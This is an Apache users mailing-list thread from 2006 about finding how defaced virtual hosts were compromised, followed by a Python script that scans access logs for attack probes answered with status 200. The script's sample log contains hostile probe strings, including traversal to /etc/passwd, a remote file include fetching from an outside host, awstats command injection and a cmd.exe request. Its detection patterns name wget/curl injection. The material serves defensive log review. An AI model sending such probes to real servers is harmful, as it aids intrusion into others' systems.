You might check out mod_security. It does not scan, but it can help prevent this in the future.
http://www.modsecurity.org/

***********************************************
Tony Guadagno
Guadagno Consulting
tonyg@xxxxxxxxxxxx
585.703.6700
***********************************************

>>> gosha@xxxxxxxx 4/27/2006 2:31 pm >>>
There are about 50 virtual servers; I can't reinstall now, I need to find the hole. The changed file has apache.apache ownership, so I think the hole is in the web server or PHP.

G.

----- Original Message -----
From: "Sean Conner" <sean@xxxxxxxxxx>
To: <users@xxxxxxxxxxxxxxxx>
Sent: Thursday, April 27, 2006 8:24 PM
Subject: Re: [users@httpd] Security scanners.

> It was thus said that the Great Georgy Goshin once stated:
>>
>> Hello,
>>
>> A few of the virtual hosts on my server were hacked - the content was
>> replaced and I can't figure out how they did it. Is there any software
>> that will scan the web server and check for known security holes?
>
> I don't know of any software [2] that will do what you ask, but having
> been the recipient of several hacks [1], your server may not have been
> compromised through the webserver---*any* other service running could
> have been the vector through which you were compromised (DNS, SQL, SMTP,
> etc.). Or it could have been an inside job (the login information to
> update one of your sites was compromised).
>
> Until you figure out how they got in, you have two choices:
>
> 1. Turn off any services you don't need (you should do this anyway),
>    change all passwords and disable all CGI scripts until they've
>    been vetted clean.
>
> 2. Nuke and pave. Reinstall the server from scratch (I only
>    recommend this if you have no clue how to proceed or are truly
>    paranoid) with the latest version you have on CD, then patch,
>    patch, patch until *all* the software is at the latest version.
>    You'll still want to turn off any services you don't need (or
>    understand) after the install, change the passwords and disable
>    any CGI scripts until they've been vetted.
>
> -spc (Been there, done that, don't even have a lousy tee shirt ... )
>
> [1] The worst so far being this one:
>
> http://boston.conman.org/2004/09/13.1
> http://boston.conman.org/2004/09/14.1
> http://boston.conman.org/2004/09/19.1
>
> There have been others though:
>
> http://boston.conman.org/2005/10/05.2
>
> [2] Actually, I do know of some, but they're the software programs that
> are currently trying to break in through an insecure webserver or
> CGI scripts. You can check your web logfiles and see plenty of
> those happening. If any of those requests are 200, then there's a
> hole.
>
> ---------------------------------------------------------------------
> The official User-To-User support forum of the Apache HTTP Server Project.
> See <URL:http://httpd.apache.org/userslist.html> for more info.
> To unsubscribe, e-mail: users-unsubscribe@xxxxxxxxxxxxxxxx
>    "   from the digest: users-digest-unsubscribe@xxxxxxxxxxxxxxxx
> For additional commands, e-mail: users-help@xxxxxxxxxxxxxxxx
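Sean's advice in [2], pulling the automated probes out of the access log and looking at which of them the server answered 200, can be scripted. The following is an added example, not code from anyone in this thread and not part of mod_security or any Apache tool: the log lines are constructed to look like the common 2006-era probes (traversal, remote file include, awstats command injection, cmd.exe), and the signature list is a hypothetical starting set to extend from whatever your own logs show. Paths are URL-decoded before matching so that `..%2f` is seen as `../`.

```python
import re
from urllib.parse import unquote

# Apache "combined" log format. Only the fields up to the size are matched,
# so "common" format lines (no referer/user-agent) parse as well.
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)(?: (?P<proto>[^"]*))?" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Hypothetical probe signatures, applied to the URL-decoded request target.
# Extend this from what you actually see scanners request against your hosts.
SIGNATURES = [
    ("path traversal",       re.compile(r'(^|/)\.\.(/|$)')),
    ("remote file include",  re.compile(r'[?&]\w+=(https?|ftp)://', re.I)),
    ("os command injection", re.compile(r'(;|\|)\s*(wget|curl|cat|id|uname)\b', re.I)),
    ("sensitive file read",  re.compile(r'/etc/(passwd|shadow)|cmd\.exe|boot\.ini', re.I)),
    ("sql injection",        re.compile(r'union\s+(all\s+)?select|\bor\s+1=1', re.I)),
]

# Constructed sample log, not taken from any real server.
SAMPLE_LOG = """\
203.0.113.7 - - [27/Apr/2006:14:02:11 +0300] "GET /index.php?page=../../../../etc/passwd HTTP/1.0" 404 294 "-" "Mozilla/4.0"
203.0.113.7 - - [27/Apr/2006:14:02:12 +0300] "GET /gallery/index.php?inc=http://198.51.100.9/c.txt? HTTP/1.0" 200 1842 "-" "libwww-perl/5.805"
198.51.100.23 - - [27/Apr/2006:14:05:40 +0300] "GET /cgi-bin/awstats.pl?configdir=|id| HTTP/1.1" 200 512 "-" "Mozilla/4.0"
192.0.2.44 - - [27/Apr/2006:14:06:02 +0300] "GET /about.html HTTP/1.1" 200 3182 "http://example.com/" "Mozilla/5.0"
203.0.113.7 - - [27/Apr/2006:14:07:55 +0300] "GET /scripts/..%2f..%2fwinnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 294 "-" "-"
"""


def parse_line(line):
    """Parse one access-log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    # Decode percent-encoding so encoded traversal sequences are matched too.
    rec["decoded_path"] = unquote(rec["path"])
    return rec


def classify(decoded_path):
    """Return the names of every signature that matches the decoded request."""
    return [name for name, rx in SIGNATURES if rx.search(decoded_path)]


def find_successful_probes(lines):
    """Return (host, raw path, status, signatures) for probes answered 200.

    A probe that got 404 or 403 shows someone is scanning; a probe that
    got 200 is the one to investigate first.
    """
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        sigs = classify(rec["decoded_path"])
        if sigs and rec["status"] == 200:
            hits.append((rec["host"], rec["path"], rec["status"], sigs))
    return hits


if __name__ == "__main__":
    # Typical use: python probes.py < /var/log/httpd/access_log
    import sys
    source = sys.stdin if not sys.stdin.isatty() else SAMPLE_LOG.splitlines()
    for host, path, status, sigs in find_successful_probes(source):
        print(f"{host} {status} {path}  <- {', '.join(sigs)}")
```

Two caveats when reading the output. A 200 on a probe is a lead, not proof: a PHP include that fails still returns 200 with a warning in the body, so check the size and the page itself. And the absence of hits does not clear the host: a scanner can use a pattern this list does not know, the successful request may have gone to a different virtual host's log, and an attacker with write access as apache could have edited or rotated the logs, which is why Sean's advice to treat every exposed service, not only httpd, as a candidate vector still stands.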